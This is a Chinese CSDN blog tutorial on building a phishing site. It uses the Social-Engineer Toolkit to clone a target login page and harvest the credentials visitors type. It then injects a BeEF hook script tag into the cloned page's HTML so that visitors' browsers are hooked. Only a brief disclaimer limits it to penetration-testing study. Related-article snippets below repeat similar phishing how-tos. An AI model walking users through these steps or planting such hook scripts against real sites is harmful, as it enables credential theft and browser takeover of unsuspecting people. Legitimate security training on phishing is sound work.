钓鱼网站的制作

最新推荐文章于 2024-06-25 18:45:00 发布
最新推荐文章于 2024-06-25 18:45:00 发布
阅读量171 收藏
点赞数 1
文章标签: xss 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_51802152/article/details/134048990
版权

                       SETOOLKIT

简介:

        setoolkit 即社会工程学工具集,是一个为社会工程设计的开源渗透测试框架,SET具有许多自定义攻击向量,可以让您快速进行可信的攻击

输入1这个模块

在输入2这个模块,当然如果你有别的需求或者做不同的东西也可以选择别的模块

我们做的是钓鱼网站所以要选3这个模块

完事看自己需求选择 我选的2

这里输入你本地 的IP地址 

然后再输入你要钓鱼的网站地址

然后再去访问你的IP地址 或者是网站的链接  kali 里面就有回显啦

vim ~/.set/web_clone/index.html

在kali里面 打开这个 这是你钓鱼网站的代码  把我们的钓鱼代码复制进去

<script src="http://127.0.0.1:3000/hook.js"></script>

保存退出 

在去访问 鱼儿就上钩啦

此课程仅供渗透学习使用,同学们切记不要做一些违法的事哦

可“刑又可“拷””

過路人!
关注
网站制作过程
05-11
"网站制作过程" 网站制作过程是指基于ASP.NET技术开发一个完整的新闻发布系统网站的步骤。该过程涉及到网站目录结构的设计、数据库字段的设计、导航方式的选择、页面风格的统一、开发方法的选择等多个方面。 在...
如何使用setoolkit实施钓鱼攻击
0day
07-11 2466
前言 当我们在访问一个网站的时候,可能偶尔会遇到这样的情况,打开网页,并没有发现什么异常,但是当我们在网页表单中输入用户名和密码等信息然后点击登录按钮进行数据提交的时候,发现页面突然闪了一下,并且页面有出现了一个空白的表单,这时候给我们的感觉就是怀疑自己刚才可能输错了数据,或者说怀疑自己的网络可能出现了什么问题。然而事实真的是这样吗?作为一个从事网络安全的技术人,我怀疑你可能已经遭受了网络钓鱼攻击。 接下来,笔者将揭秘一下黑客是如何通过setoolkit这个软件实施网络钓鱼攻击的。 实验环境准备 攻
set工具集的基础使用
whoim_i的博客
10-22 4397
一、setoolkit介绍 开源的社会工程学利用套件,通常结合 metasploit 来使用。Social-Engineer Toolkit 专 门 用 于 社 会 工 程 的 高 级 攻 击 包 。SET 由 David Kennedy(ReL1K)编写,并在社区人员的大量帮助下,它包含了 以前从未见过的攻击工具集。渗透测试期间,工具包中内置的攻击工具可以进行有针 对性地集中攻击。SET 的主要...
内网穿透实例练习:setoolKit+花生壳 >钓鱼网站
最新发布
2401_84488537的博客
06-25 1174
从这个工具摆放的位置就能够很明显看出他的属性了--社工!简单了解一下setoolKit攻击基本模块我们这次当然就是使用钓鱼网站攻击了~前置要求:~在进行不同攻击前一定要确保将前一次监听完全退出!(Crtl+C一直退到最开始)文中有退出不彻底的后果嘻嘻嘻~搞清楚自己kali的ip(ifconfig命令)begin.在第一个练习我会介绍使用setoolKit直到找到本次练习的步骤,后面因步骤相同就不再赘述首先打开setoolKit,成功界面是这样的选择1 社工选择2 网站攻击选择3 钓鱼网站攻击。
setoolkit制作简单钓鱼网站
weixin_51646864的博客
10-31 3600
setoolkit制作简单钓鱼网站 打开setoolkit,在终端输入setoolkit打开,也可以直接搜索打开 2.选择下图的第一个“社会工程攻击”,即输入1回车 3、选择下图的第三个 4、选择下图的第三个 5、选择下图的第二个 6、下图这里输入本机的IP地址后回车 7、下面这里输入你要克隆的网页网址,回车 8、然后到了下图,简单钓鱼网站就完成了,在另一台主机的浏览器中输入你刚才第六步时输入的ip就会访问到克隆出来的钓鱼网页,用户在网页上输入的账号密码都会显示在kali这边。 ps:仅限于内网,
[ 常用工具篇 ] 使用 kali 实现网络钓鱼 -- setoolkit 详解实战(一)
qq_51577576的博客
12-21 4502
[ 常用工具篇 ] 使用 kali 实现网络钓鱼 -- setoolkit 详解实战(一) 用setoolkit进行钓鱼攻击,kali是根据要克隆的网址将网站保存在某个文件夹下,并且添加一些其他的信息,主要是将受害者输入的信息截获下来,并保存到有一个文本文件中,还有截获完之后,使浏览器跳转到正常页面。
setoolkit克隆网站并抓取账号密码
博客地址 www.sec0nd.top
09-06 2035
社会工程师工具包(The Social-Engineer Toolkit)是一个为社会工程设计的开源渗透测试框架。SET有许多自定义攻击向量,允许您快速地进行可信的攻击。SET是TrustedSec有限责任公司的产品,该公司是一家位于俄亥俄州克利夫兰的信息安全咨询公司。此工具包中除了setoolkit还有seautomate和seproxysetoolkit默认会安装在kali中,直接使用即可。
fluxion Wifi 钓鱼汉语页面.zip
02-02
Fluxion是一款基于Linux的网络攻击工具,专用于执行Wi-Fi中间人(Man-in-the-Middle,MITM)攻击,尤其是Wi-Fi钓鱼攻击。这款工具主要用于安全研究和渗透测试,帮助用户发现网络中的漏洞和安全缺陷。 Fluxion以其...
蓝天白云户外钓鱼网站模板下载_蓝天 白云 户外 钓鱼 企业 蓝天 休闲.zip
02-19
网站模板是预先设计好的网页布局和样式,包括色彩搭配、字体风格、图片选择等,它们通常由专业的网页设计师制作。用户可以根据自己的需求进行定制,快速构建网站,而无需从零开始设计。这种模板化的方式极大地节省了...
Omega:HTML编码的多功能钓鱼网站
03-18
用简单HTML编码的网络钓鱼工具。 脸书|推特| INSTAGRAM | NETFLIX |贝宝 信用:- HiddenEye(针对网上诱骗页面) 考虑捐赠 要求 Google Firebase GitHub帐户 免责声明 仅用于教育目的 欧米茄的使用是最终用户的...
钓鱼爱好者俱乐部网页模板
01-20
在钓鱼爱好者俱乐部的网页模板中,FlashMX 可能被用来设计动态的钓鱼动画,比如鱼儿上钩的瞬间或者鱼竿挥舞的动作,以增加网站的趣味性和吸引力。 【PSD】文件是Photoshop的设计源文件,包含所有设计图层、文字、...
使用setoolkit制作钓鱼网站并结合dvwa靶场储存型XSS漏洞利用
Welcome To Myon'Blog !
12-31 1295
2) Penetration Testing (Fast-Track) 2) 渗透测试(快速通道)(注意观察url,此时已经跳回到了正确靶场登录界面的URL,也就是说下次用户即可正常登录)此时需要设置一个属于是监听的ip,即我们kali的ip地址(也就是它括号里推荐的ip)如果用户不知情,没有注意URL的差异,而是单纯看页面样子一样,就直接进行登录。此时如果我们访问kali的ip地址,出来的便是dvwa靶场的登录页面。此时用户以为自己输错了密码,于是重新登录,即可登录成功。
社工利器--setoolkit之钓鱼攻击
Aisen_bear的博客
08-04 2352
该文章仅供参考学习,切勿用于非法用途 简介 社会工程学(Social Engineering)认为人为因素才是安全的软肋。很多企业、公司在信息安全上投入大量的资金,最终导致数据泄露的原因,往往却是发生在人本身。你们可能永远都想象不到,对于黑客们来说,通过一个用户名、一串数字、一串英文代码,社会工程师就可以通过这么几条的线索,通过社工攻击手段,加以筛选、整理,就能把你的所有个人情况信息、家庭状况、兴趣爱好、婚姻状况、你在网上留下的一切痕迹等个人信息全部掌握得一清二楚。虽然这个可能是最不起眼,而且还是最麻烦的
社会工程学——setoolkit的简单使用(克隆钓鱼网站
Lzcsfg的博客
04-11 1192
Social Engineer ToolkitSET)是一个开源的社会工程学攻击工具包,旨在模拟和执行多种社会工程学攻击,例如钓鱼、恶意软件传播和其他形式的社会工程学攻击。需要注意的是该克隆默认设置只可获取到以username 和password为字段的表单的信息,各网站设计者用的不一样,需要进一步学习实现克隆并获取。下一步需要在网站上输入你的攻击机ip,即kali的IP即可进入克隆的钓鱼网站,当别人输入账户密码或者注册时你的kali终端这就会获取到。
【kali-权限提升】(4.2.2)社会工程学工具包:web站点克隆钓鱼
08-07 853
【社会工程学工具包】web站点克隆钓鱼
第一次尝试制作一个钓鱼网站,小白教程,超细!
热门推荐
qq_46089119的博客
02-05 1万+
钓鱼网站制作
渗透测试——漏洞扫描工具
wuli1024的博客
11-20 927
然后还要将all这个压缩包里的plugin_feed_info.inc提取出来,命令行是 tar -zxvf all-2.0.tar.gz plugin_feed_info.inc,然鹅,我提取不出来。将下载好的插件移动到Nessus目录下,然后输入sudo /opt/nessus/sbin/nessuscli update all-2.0.tar.gz。用户名和密码随便写写就好,随后将会更新补丁,OK,这样Nessus可以使用了。将会获得一串数字,然后去激活码的这个网站,输入自己的邮箱获取激活码。
kali制作一个简单的钓鱼网站
guetstudents的博客
11-24 749
然后选择3.Credential Harvester Attack Method攻击模块,选择2克隆网站。打开自已的kali,进入首先进入root模式,开启setoolkit模块。当我们输入账号密码登录后,会回显到正确的网站地址。我们选择1,社会工程学攻击,后面还会出现选项。4、建立payload和listener。即出现自已克隆的网站,kali显示上线。这里我们选择2,网页攻击,出现。9、Powershell攻击。6、Arduino基础攻击。输入自已想克隆的网站,回车。
网络安全 社会工程学--钓鱼网站制作和利用(让你了解整个钓鱼网站 背后的秘密.)
网络安全领域___专研者.
04-07 4861
现在的互联网很发达,钓鱼网站也是无处不有的,所有让我带你了解钓鱼网站制作,使用(后台的秘密)和防御。 钓鱼网站的 概括 : 顾名思义钓鱼网站,就是愿者上钩的网站一般的这些网站都是有鱼饵。一般都是贪图小便宜的人才会损失很大,所以在我们进行网购的时候,一定要仔细识别网站平台的真假。不能因为便宜就轻易相信并交易。而这些钓鱼网站即使做的再惟妙惟肖,也是会有蛛丝马迹的不同。但是域名(链接)这块,是不可能 一模一样 的.
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

過路人!

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值